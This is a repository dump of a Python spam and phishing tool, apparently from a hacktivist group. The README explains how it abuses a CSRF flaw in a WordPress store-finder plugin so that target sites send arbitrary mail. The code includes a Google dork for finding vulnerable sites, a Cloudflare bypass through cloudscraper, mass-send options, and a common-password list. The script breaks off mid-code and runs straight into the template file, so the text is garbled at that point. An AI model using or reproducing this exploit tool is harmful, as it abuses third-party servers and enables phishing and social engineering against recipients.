├── README.md
├── mail
├── list.txt
└── password.txt
├── requirements.txt
├── spamail.py
└── template
└── template.txt
/README.md:
--------------------------------------------------------------------------------
1 | # Unrestricted SENDMAIL (SSF Vulnerability)
2 | Unrestricted send mails through csrf vulnerability using target server mail
3 |
4 | 
5 |
6 | # Get Started
7 | pip -r requirements.txt
8 |
9 | # Options
10 | Option(arguments)
11 | -u : URL
12 | -s : Sender
13 | -x : Template.html
14 | -r : Receiver (in TXT or email)
15 | --single : one time send mail
16 | --mass : mass sender multiple emails
17 | --singlemass : for spam single email followed by -c for count of spam
18 | -c : count
19 |
20 | Example --singlemass
21 | python ssf.py -u https://example.com/ -s admin@example.com -x template/template.txt -r target@mail.com --singlemass -c 10
22 | 
23 |
24 | Example --mass
25 | python ssf.py -u https://example.com/ -s admin@example.com -x template.txt -r mail/list.txt --mass
26 | 
27 |
28 | Example target inbox
29 | 
30 | 
31 |
32 | # Platforms
33 | Can be use in windows & linux
34 |
--------------------------------------------------------------------------------
/mail/list.txt:
--------------------------------------------------------------------------------
1 | emai@example.com
2 | emai@example.com
3 | emai@example.com
4 | emai@example.com
5 | emai@example.com
6 | emai@example.com
7 |
--------------------------------------------------------------------------------
/mail/password.txt:
--------------------------------------------------------------------------------
1 | abc123
2 | johncena
3 | password
4 | chromepass
5 | administrator
6 | katalaluan
7 | qwerty
8 | 123456
9 | 12345678
10 | iloveyou
11 | 1q2w3e4r
12 | 000000
13 | qwerty123
14 | zaq12wsx
15 | dragon
16 | sunshine
17 | princess
18 | letmein
19 | 654321
20 | monkey
21 | 27653
22 | kali
23 | 1qaz2wsx
24 | 123321
25 | qwertyuiop
26 | superman
27 | asdfghjkl
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | cloudscraper
2 | colorama
--------------------------------------------------------------------------------
/spamail.py:
--------------------------------------------------------------------------------
1 | import cloudscraper, sys, os, colorama, time, ctypes, datetime, sys, platform, threading
2 | from urllib.parse import urlparse
3 | from colorama import Fore, Back, Style
4 | from datetime import date
5 | from time import gmtime, strftime
6 |
7 | today = date.today()
8 | d2 = today.strftime("%B %d, %Y")
9 |
10 | if platform.system()=='Linux':
11 | os.system('clear')
12 | sys.stdout.write("\x1b]2;SPAM-PHISHING MAIL DFM {}\x07".format(d2))
13 | else:
14 | os.system('cls')
15 | ctypes.windll.kernel32.SetConsoleTitleW(f'SPAM-PHISHING MAIL DFM | {d2}')
16 |
17 | print(f"""{Style.BRIGHT + Fore.RED}
18 | ██████╗ ██████╗ █████╗ ██████╗ ██████╗ ███╗ ██╗███████╗ ██████╗ ██████╗ ██████╗███████╗ ██╗ ██████╗
19 | ██╔══██╗██╔══██╗██╔══██╗██╔════╝ ██╔═══██╗████╗ ██║██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔════╝ ██║██╔═══██╗
20 | ██║ ██║██████╔╝███████║██║ ███╗██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██║ █████╗ ██║██║ ██║
21 | ██║ ██║██╔══██╗██╔══██║██║ ██║██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██╔══╝ ██║██║ ██║
22 | ██████╔╝██║ ██║██║ ██║╚██████╔╝╚██████╔╝██║ ╚████║██║ ╚██████╔╝██║ ██║╚██████╗███████╗██╗██║╚██████╔╝
23 | ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝╚═╝╚═╝ ╚═════╝
24 |
25 | {Fore.WHITE}═══════════════════════════════════════════════════════════════════════════════════════════════════════════════
26 | {Style.BRIGHT + Fore.YELLOW}
27 | Email Mass SPAM by EAGLE EYE
28 | Google Dorks(example) : inurl:/wp-content/plugins/superstorefinder/
29 | https://dragonforce.io | Telegram: dragonforceio
30 | Get Started With (pip install -r requirements.txt)
31 | USED FOR SPAM MAIL AND SOCIAL ENGINEERING
32 |
33 | {Fore.WHITE}═══════════════════════════════════════════════════════════════════════════════════════════════════════════════
34 | """)
35 |
36 | def helpdesk():
37 | print(Style.BRIGHT+"Usage (example) : python ssf.py -u https://lol.com/ -s admin@lol.com -x template.txt -r target@mail.com --single")
38 | print(Style.BRIGHT+"Usage (example) : python ssf.py -u https://lol.com/ -s admin@lol.com -x template.txt -r targetlist.txt --mass")
39 | print(Style.BRIGHT+"Usage (example) : python ssf.py -u https://lol.com/ -s admin@lol.com -x template.txt -r target@mail.com --singlemass -c 10")
40 |
41 | def mailList(txt):
42 | try:
43 | f = open(txt,'r')
44 | return f.readlines()
45 | except FileNotFoundError:
46 | print(Style.BRIGHT+Fore.RED+"File '{}' not found".format(txt))
47 |
48 | def loadTemplate(txt):
49 | try:
50 | f = open(txt,'rb')
51 | return f.read().decode('utf-8')
52 | except:
53 | print(Style.BRIGHT+Fore.RED+"File '{}' not found".format(txt))
54 |
55 | def position(arr,types):
56 | if(types=="-u" or types=="-s" or types=="-r" or types=="-x" or types=="-c"):
57 | return arr.index(types) + 1
58 | else:
59 | print(Style.BRIGHT+Fore.White+"\t\t\t\tNo such options for {}!".format(types))
60 | helpdesk()
61 | sys.exit(0)
62 | os._exit(0)
63 |
64 | def arglength():
65 | if(len(sys.argv)>12):
66 | helpdesk()
67 | return False
68 | else:
69 | return True
70 |
71 | def spamMail(url,sender,receiver,temp):
72 | scraper = cloudscraper.create_scraper(
73 | browser={
74 | 'browser': 'firefox',
75 | 'platform': 'linux',
76 | 'mobile': False
77 | }
78 | )
79 | headers = {"Content-Type":"application/x-www-form-urlencoded"}
80 | templateX = '-->'+loadTemplate(temp)
81 | data = {
82 | 'name_lbl' : '
2 | henlo
--------------------------------------------------------------------------------